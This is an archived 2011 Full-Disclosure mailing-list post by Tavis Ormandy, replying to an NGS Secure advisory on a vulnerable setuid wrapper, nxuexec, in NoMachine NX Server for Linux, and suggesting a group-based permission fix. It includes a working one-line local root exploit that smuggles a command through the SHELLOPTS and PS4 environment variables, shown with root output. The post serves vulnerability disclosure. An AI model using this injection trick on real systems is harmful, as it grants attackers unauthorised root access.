| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 21 Sep 2011 20:33:49 +0200 From: Tavis Ormandy <taviso@...xchg8b.com> To: full-disclosure@...ts.grok.org.uk Cc: bugtraq@...urityfocus.com Subject: Re: NGS00099 Patch Notification: Vulnerable SUID script in (nomachine) NX Server for Linux Research@...Secure <research@...secure.com> wrote: > Vulnerable SUID script in (nomachine) NX Server for Linux 3.5.0-4 > (Advanced and Enterprise across redhat and debian hosts) > > 21 September 2011 > > NGS Secure has discovered a High risk vulnerability in (nomachine) NX > Server for Linux 3.5.0-4 (Advanced and Enterprise across redhat and debian > hosts). > > Impact: Arbitrary files can be read with root privileges > > The fix was rated critical by the vendor and short term patch was to > remove the offending script. > > http://www.nomachine.com/tr/view.php?id=TR08I02575 > > NGS Secure is going to withhold details of this flaw for three months. > This three month window will allow users the time needed to apply the > patch before the details are released to the general public. This reflects > the NGS Secure approach to responsible disclosure. > > NGS Secure Research http://www.ngssecure.com > > > > I guess I probably wasn't the only person confused by your advisory, you described a setuid script, but didn't explain how that's possible. I don't know if you were being intentionally secretive, but I looked into it. It looks like NX ship a suid wrapper called nxuexec that operates in a similar fashion to suidperl. suidperl had numerous problems over the years until it was beaten into reasonable shape by researchers, obviously nuexec has not had that benefit. $ ls -l /usr/NX/bin/nxuexec -r-sr-xr-x 1 root root 14K Sep 24 2009 /usr/NX/bin/nxuexec* I suppose the problem you're referring to is the user-controlled parameter being passed to bash, allowing you to trivially escape from the quoted string. I won't provide full details as per your wishes, although I think it will be obvious to anyone who looks after reading your description. However, nxuexec is clearly broken by design. The reason it's hard to create suidroot shell scripts is because if you think that's a good idea, you probably shouldnt be doing it :-) They're implementation has numerous problems, the most obvious is failure to adequately sanitise the environment: $ env SHELLOPTS=xtrace PS4='$(/usr/bin/id)' /usr/NX/bin/nxuexec nxdpyinfo.sh uid=0(root) (This xtrace trick is an old technique to bypass the blacklisting used by sudo a few years ago, of course it uses whitelisting now) I'm sure there are far more problems, I would suggest creating a new group, e.g. nxtrusted, then something like this: # chgrp nxtrusted /usr/NX/bin/nxuexec # chmod 4750 /usr/NX/bin/nxuexec Now you can add the users you trust to this group. Tavis. -- ------------------------------------- taviso@...xchg8b.com | pgp encrypted mail preferred ------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists